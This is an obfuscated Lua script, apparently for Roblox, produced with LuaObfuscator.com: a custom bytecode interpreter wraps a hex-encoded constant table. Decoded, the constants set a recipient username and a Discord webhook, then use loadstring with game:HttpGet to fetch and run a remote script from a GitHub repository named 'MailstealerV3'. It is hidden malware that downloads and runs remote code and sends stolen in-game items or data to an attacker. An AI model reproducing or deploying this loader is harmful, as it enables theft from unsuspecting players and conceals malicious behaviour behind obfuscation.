--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v69=(v31/((1 + 1)^(v32-(1 + 0 + 0))))%((5 -(1 + 2))^(((v33-(2 -(958 -(892 + 65)))) -(v32-((2 -1) -0))) + 1)) ;return v69-(v69%(2 -1)) ;else local v70=0;local v71;while true do if ((619 -(555 + 64))==v70) then v71=(933 -(857 + 74))^(v32-((1051 -482) -(367 + 201))) ;return (((v31%(v71 + v71))>=v71) and (4 -3)) or (927 -(214 + 713)) ;end end end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34,v35,v36,v37=v1(v16,v19,v19 + (4 -1) );v19=v19 + 4 ;return (v37 * ((41191679 -24414113) -(87 + 263))) + (v36 * (65716 -(67 + 113))) + (v35 * (188 + 68)) + v34 ;end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v38=0 + 0 ;local v39;local v40;local v41;local v42;local v43;local v44;local v45;while true do if (v38==(5 -2)) then v45=nil;while true do local v77=0;while true do if (v77==1) then if (v39==(1821 -(1483 + 338))) then v40={};v41={};v42={};v39=1696 -(1229 + 466) ;end if (v39==1) then local v103=0;while true do if (v103~=0) then else v43={v40,v41,nil,v42};v44=v24();v103=1263 -(1091 + 171) ;end if ((1 + 0)==v103) then v45={};v39=6 -4 ;break;end end end break;end if (v77~=(0 -0)) then else if (v39==(376 -(123 + 251))) then local v104=0;while true do if (v104==(4 -3)) then for v107=1,v24() do local v108=698 -(208 + 490) ;local v109;local v110;local v111;while true do if (v108~=0) then else v109=0 + 0 ;v110=nil;v108=1;end if (v108==1) then v111=nil;while true do if ((0 + 0)==v109) then v110=0;v111=nil;v109=1;end if (1~=v109) then else while true do if ((836 -(660 + 176))==v110) then v111=v22();if (v21(v111,1,1)~=(0 + 0)) then else local v183=0;local v184;local v185;local v186;local v187;while true do if ((202 -(14 + 188))==v183) then local v188=0;while true do if (v188==(675 -(534 + 141))) then local v189=0 + 0 ;while true do if (v189~=(1 + 0)) then else v188=1 + 0 ;break;end if (v189==0) then v184=0;v185=nil;v189=1;end end end if (v188==(1 -0)) then v183=1 -0 ;break;end end end if (v183~=(2 -1)) then else v186=nil;v187=nil;v183=2;end if (v183==(2 + 0)) then while true do if (v184==1) then local v190=0;local v191;local v192;while true do if (v190~=0) then else v191=0;v192=nil;v190=1;end if (v190~=1) then else while true do if (v191~=0) then else v192=0 + 0 ;while true do if (v192==0) then local v204=396 -(115 + 281) ;while true do if (v204==(0 -0)) then v187={v23(),v23(),nil,nil};if (v185==0) then local v205=867 -(550 + 317) ;local v206;local v207;while true do if (v205~=0) then else v206=0;v207=nil;v205=1;end if (v205==(1 -0)) then while true do if (v206==(0 -0)) then v207=0 -0 ;while true do if (v207~=(285 -(134 + 151))) then else v187[1668 -(970 + 695) ]=v23();v187[4]=v23();break;end end break;end end break;end end elseif (v185==1) then v187[5 -2 ]=v24();elseif (v185==(1992 -(582 + 1408))) then v187[10 -7 ]=v24() -(2^16) ;elseif (v185~=(3 -0)) then else local v210=0 -0 ;local v211;local v212;while true do if (v210==(1824 -(1195 + 629))) then v211=0;v212=nil;v210=1 -0 ;end if (v210==(242 -(187 + 54))) then while true do if (v211==(780 -(162 + 618))) then v212=0 + 0 ;while true do if (v212==(0 + 0)) then v187[6 -3 ]=v24() -((2 -0)^(2 + 14)) ;v187[4]=v23();break;end end break;end end break;end end end v204=1637 -(1373 + 263) ;end if (v204==1) then v192=1;break;end end end if (v192==(1001 -(451 + 549))) then v184=2;break;end end break;end end break;end end end if (0==v184) then local v193=0 + 0 ;local v194;local v195;while true do if (v193==(1 -0)) then while true do if (v194~=(0 -0)) then else v195=1384 -(746 + 638) ;while true do if (v195==0) then v185=v21(v111,2,3);v186=v21(v111,2 + 2 ,6);v195=1;end if (v195==(1 -0)) then v184=342 -(218 + 123) ;break;end end break;end end break;end if (v193~=0) then else v194=1581 -(1535 + 46) ;v195=nil;v193=1 + 0 ;end end end if (v184~=(1 + 1)) then else local v196=0;while true do if (v196==(560 -(306 + 254))) then if (v21(v186,1,1)==(1 + 0)) then v187[3 -1 ]=v45[v187[1469 -(899 + 568) ]];end if (v21(v186,2 + 0 ,4 -2 )==1) then v187[3]=v45[v187[606 -(268 + 335) ]];end v196=1;end if (v196==1) then v184=293 -(60 + 230) ;break;end end end if (v184~=(575 -(426 + 146))) then else if (v21(v186,3,1 + 2 )==(1457 -(282 + 1174))) then v187[815 -(569 + 242) ]=v45[v187[11 -7 ]];end v40[v107]=v187;break;end end break;end end end break;end end break;end end break;end end end v39=3;break;end if ((0 + 0)==v104) then for v112=1,v44 do local v113=1024 -(706 + 318) ;local v114;local v115;local v116;local v117;while true do if (v113~=(1252 -(721 + 530))) then else v116=nil;v117=nil;v113=2;end if (v113==0) then v114=0;v115=nil;v113=1;end if (v113~=(1273 -(945 + 326))) then else while true do if (v114==0) then local v168=0;while true do if (v168==0) then v115=0 -0 ;v116=nil;v168=1 + 0 ;end if ((701 -(271 + 429))==v168) then v114=1 + 0 ;break;end end end if (v114==1) then v117=nil;while true do if (v115~=(1501 -(1408 + 92))) then else if (v116==(1087 -(461 + 625))) then v117=v22()~=(1288 -(993 + 295)) ;elseif (v116==(1 + 1)) then v117=v25();elseif (v116==3) then v117=v26();end v45[v112]=v117;break;end if (v115~=0) then else v116=v22();v117=nil;v115=1172 -(418 + 753) ;end end break;end end break;end end end v43[3]=v22();v104=1;end end end if (v39==(2 + 1)) then local v105=0 + 0 ;while true do if (v105==(0 + 0)) then for v118=1,v24() do v41[v118-1 ]=v29();end return v43;end end end v77=1 + 0 ;end end end break;end if (v38==0) then v39=529 -(406 + 123) ;v40=nil;v38=1770 -(1749 + 20) ;end if (v38~=1) then else v41=nil;v42=nil;v38=1 + 1 ;end if (v38~=(1324 -(1249 + 73))) then else v43=nil;v44=nil;v38=3;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v46=v24();local v47=v24();local v48=(414 -(15 + 398)) + 0 ;local v49=(v21(v47,1146 -((1448 -(18 + 964)) + 679) ,66 -46 ) * ((4 -2)^((342 -251) -59))) + v46 ;local v50=v21(v47,42 -21 ,1931 -(106 + 1039 + 755) );local v51=((v21(v47,11 + 21 )==(1 + 0)) and  -(1 + 0 + (850 -(20 + 830)))) or (1 + 0) ;if (v50==(0 -0)) then if (v49==(0 -0)) then return v51 * (1212 -(323 + 889)) ;else local v78=0 -0 ;while true do if ((114 -(4 + 110))==v78) then v50=585 -(57 + 527) ;v48=320 -(53 + 267) ;break;end end end elseif (v50==(3474 -(41 + 1386))) then return ((v49==0) and (v51 * ((104 -(17 + 86))/((126 -(116 + 10)) + 0 + 0)))) or (v51 * NaN) ;end return v8(v51,v50-1023 ) * (v48 + (v49/((3 -1)^(150 -98)))) ;end v26=nil;function v26(v52)local v53;if  not v52 then local v72=(0 -0) + (1551 -(1126 + 425)) ;while true do if (v72==(738 -(542 + 196))) then v52=v24();if (v52==(0 + 0)) then return "";end break;end end end v53=v3(v16,v19,(v19 + v52) -(2 -1) );v19=v19 + v52 ;local v54={};for v67=1 -0 , #v53 do v54[v67]=v2(v1(v3(v53,v67,v67)));end return v6(v54);end v18=5;end if (v18==2) then function v22()local v55=v1(v16,v19,v19);v19=v19 + 1 ;return v55;end v23=nil;function v23()local v56=405 -(118 + 287) ;local v57;local v58;while true do if (v56==0) then v57,v58=v1(v16,v19,v19 + 2 );v19=v19 + (7 -5) ;v56=1122 -(118 + 1003) ;end if (v56==(2 -(4 -3))) then return (v58 * (633 -(142 + 235))) + v57 ;end end end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v59)if (v1(v59,2)==79) then v20=v0(v3(v59,1,1));return "";else local v73=v2(v0(v59,16));if v20 then local v79=0;local v80;while true do if (v79==0) then v80=v5(v73,v20);v20=nil;v79=1;end if (v79==1) then return v80;end end else return v73;end end end);v18=1;end if (v18==7) then function v30(v60,v61,v62)local v63=0;local v64;local v65;local v66;while true do if (v63==1) then v66=v60[3];return function(...)local v81=v64;local v82=v65;local v83=v66;local v84=v28;local v85=1;local v86= -1;local v87={};local v88={...};local v89=v12("#",...) -1 ;local v90={};local v91={};for v95=0,v89 do if (v95>=v83) then v87[v95-v83 ]=v88[v95 + 1 ];else v91[v95]=v88[v95 + 1 ];end end local v92=(v89-v83) + 1 ;local v93;local v94;while true do local v96=0;while true do if (v96==0) then v93=v81[v85];v94=v93[1];v96=1;end if (v96==1) then if (v94<=5) then if (v94<=2) then if (v94<=0) then if ((v93[3]=="_ENV") or (v93[3]=="getfenv")) then v91[v93[2]]=v62;else v91[v93[2]]=v62[v93[3]];end elseif (v94==1) then local v126=v93[2];local v127=v91[v93[3]];v91[v126 + 1 ]=v127;v91[v126]=v127[v93[4]];else local v131;local v132,v133;local v134;local v135;v62[v93[3]]=v91[v93[2]];v85=v85 + 1 ;v93=v81[v85];if ((v93[3]=="_ENV") or (v93[3]=="getfenv")) then v91[v93[2]]=v62;else v91[v93[2]]=v62[v93[3]];end v85=v85 + 1 ;v93=v81[v85];if ((v93[3]=="_ENV") or (v93[3]=="getfenv")) then v91[v93[2]]=v62;else v91[v93[2]]=v62[v93[3]];end v85=v85 + 1 ;v93=v81[v85];v135=v93[2];v134=v91[v93[3]];v91[v135 + 1 ]=v134;v91[v135]=v134[v93[4]];v85=v85 + 1 ;v93=v81[v85];v91[v93[2]]=v93[3];v85=v85 + 1 ;v93=v81[v85];v135=v93[2];v132,v133=v84(v91[v135](v13(v91,v135 + 1 ,v93[3])));v86=(v133 + v135) -1 ;v131=0;for v155=v135,v86 do v131=v131 + 1 ;v91[v155]=v132[v131];end v85=v85 + 1 ;v93=v81[v85];v135=v93[2];v91[v135]=v91[v135](v13(v91,v135 + 1 ,v86));v85=v85 + 1 ;v93=v81[v85];v91[v93[2]]();v85=v85 + 1 ;v93=v81[v85];v85=v93[3];end elseif (v94<=3) then v85=v93[3];elseif (v94==4) then local v145=v93[2];local v146,v147=v84(v91[v145](v13(v91,v145 + 1 ,v93[3])));v86=(v147 + v145) -1 ;local v148=0;for v158=v145,v86 do v148=v148 + 1 ;v91[v158]=v146[v148];end else v91[v93[2]]=v93[3]~=0 ;end elseif (v94<=8) then if (v94<=6) then v91[v93[2]]=v93[3];elseif (v94>7) then do return;end else local v150=v93[2];v91[v150]=v91[v150](v13(v91,v150 + 1 ,v86));end elseif (v94<=10) then if (v94>9) then v62[v93[3]]=v91[v93[2]];else local v154=0;while true do if (v154==4) then v85=v93[3];break;end if (v154==0) then v62[v93[3]]=v91[v93[2]];v85=v85 + 1 ;v93=v81[v85];v154=1;end if (3==v154) then v91[v93[2]]=v93[3];v85=v85 + 1 ;v93=v81[v85];v154=4;end if (v154==2) then v62[v93[3]]=v91[v93[2]];v85=v85 + 1 ;v93=v81[v85];v154=3;end if (1==v154) then v91[v93[2]]=v93[3];v85=v85 + 1 ;v93=v81[v85];v154=2;end end end elseif (v94==11) then if (v91[v93[2]]==v93[4]) then v85=v85 + 1 ;else v85=v93[3];end else v91[v93[2]]();end v85=v85 + 1 ;break;end end end end;end if (v63==0) then v64=v60[1];v65=v60[2];v63=1;end end end return v30(v29(),{},v17)(...);end end end v15("LOL!0B3O00028O00026O00F03F030D3O004C6F6164696E675363722O656E030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F45676F72696B7573612F4D61696C737465616C657256332F6D61696E2F6D61696E03083O00557365726E616D65030F3O00416E67656C6F5F303630363036303603073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3139333533353233323330363035333139302F56524350565448506D6E546E53383961365F6D4358525459626A65555A497370727A7836557A4F484C4E5F44572O30427767367951476C646169735F3053696F70566D3400163O0012063O00013O00260B3O000D000100020004033O000D00012O0005000100013O001202000100033O00122O000100043O00122O000200053O00202O00020002000600122O000400076O000200046O00013O00024O00010001000100044O0015000100260B3O0001000100010004033O00010001001206000100093O001209000100083O00122O0001000B3O00122O0001000A3O00124O00023O00044O000100012O00083O00017O00",v9(),...);
